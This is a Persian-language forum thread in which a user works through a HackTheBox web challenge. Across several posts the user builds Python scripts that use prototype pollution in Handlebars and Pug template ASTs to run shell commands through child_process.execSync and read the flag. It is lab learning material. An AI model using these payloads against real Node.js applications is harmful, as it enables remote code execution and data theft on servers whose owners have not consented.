رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

 

سلام دوستان من امروز توی سایت hackthebox

به یک مشکل برخوردم 

داستان از این قراره که یه سایت هست که فیلد داره و اون فیلد اسم مشخصی رو از ما میگیره  یه ورودی رو به ادرس /api/submit پست میکنه 

که اگه ما یه بخش اضافه با جیسان بفستیم اون کد رو ران میکنه 

 

ادرس سایت چلنج رو باید خودتون از hathebox بگیرید چون متفاوته سورس رو هم میتونید دانلود کنید 

اما من وقتی دنبال این داستان رفتم به هر جایی سر زدم نشد که نشد 

حتی اسکریپت های خودشون هم که میگن کار کرده کار نمیکنه برا من و 404 میده

import requests


TARGET_URL = 'http://host:port'
r = requests.post(TARGET_URL+'/api/submit', json = {
    "artist.name":"Gingell",
    "__proto__.type": "Program",
    "__proto__.body": [{
        "type": "MustacheStatement",
        "path": 0,
        "params": [{
            "type": "NumberLiteral",
            "value": "process.mainModule.require('child_process').execSync('cat flag* > static/js/main.js')"
        }],
        "loc": {
            "start": 0,
            "end": 0
        }
    }]
    })

print(r.status_code)
print(r.text)

print(requests.get(TARGET_URL+'/static/main.js').text)

 

لینک چلنج

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

الان متوجه شدم که اسکریپت بالا برای handelbar بوده و سرور از کامپایلر pug استفاده میکنه 

و الان میتونم به سرور یه چیزی بفرستم ولی پاسخ :

200
{"response":"<span>Hello guestndefine, thank you for letting us know!</span>"}

رو داریم 

اگه اکسپلویت من با اسکریپت زیر 

import requests


TARGET_URL = 'http://host:port'

# make pollution
r = requests.post(TARGET_URL+'/api/submit', json = {"artist.name":"Westaway",
  "__proto__.type": "Program",
    "__proto__.block": {
        "type": "Text", 
        "line": "process.mainModule.require('child_process').execSync('ls')"    }
})


print(r.status_code)
print(r.text)

کار نمیکرد باید این پاسخ رو میداد  

 

200
{"response":"<span>Hello guest, thank you for letting us know!</span>"}

 

الان نمیدونم چرا کامندم ران نمیشه 

با اگرهم ران میشه نمیتونم وصل شم

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

مشکل در اینجا بود که من وقتی دستور رو میزدم رسپانسش توی هیچی نمیریختم 

import requests


TARGET_URL = 'http://host:port'

# make pollution
r = requests.post(TARGET_URL+'/api/submit', json = {"artist.name":"Westaway",
  "__proto__.type": "Program",
    "__proto__.block": {
        "type": "Text", 
        "line": "process.mainModule.require('child_process').execSync('ls > static/js/main.js')"    }
})


print(r.status_code)
print(r.text)

# اینجا میتونید یه ریکویست به اون صفحه و فایل دلخواه بزنید ولی من با کرون رفتم سریع تر بشه 

این الان به من فایلا رو نشون داد الان کافیه فایل فلگ رو بخونم 

 

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

بلاخره با اسکریپت زیر تونستم کارو تموم کنم 

یه زمانی میگفتن پایتون برای اکسپلویت نویسی عالیه ولی نمیفهمیدم چرا 

الان به معنای واقعی کلمه درک کردم 

 

اسکریپت نهایی

import requests


TARGET_URL = 'http://host:port'

# make pollution
r = requests.post(TARGET_URL+'/api/submit', json = {"artist.name":"Westaway",
  "__proto__.type": "Program",
    "__proto__.block": {
        "type": "Text", 
        "line": "process.mainModule.require('child_process').execSync('cat flag2GSEN > static/js/main.js')"    }
})


print(r.status_code)
print(r.text)

 

فقط کافیه با کروم یا یه ریکویست ته اسکریپت رو به مسیر host:port/static/js/main.js بزنید 

و تهش فلگ خونده میشه و براتون به نمایش در میاد

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...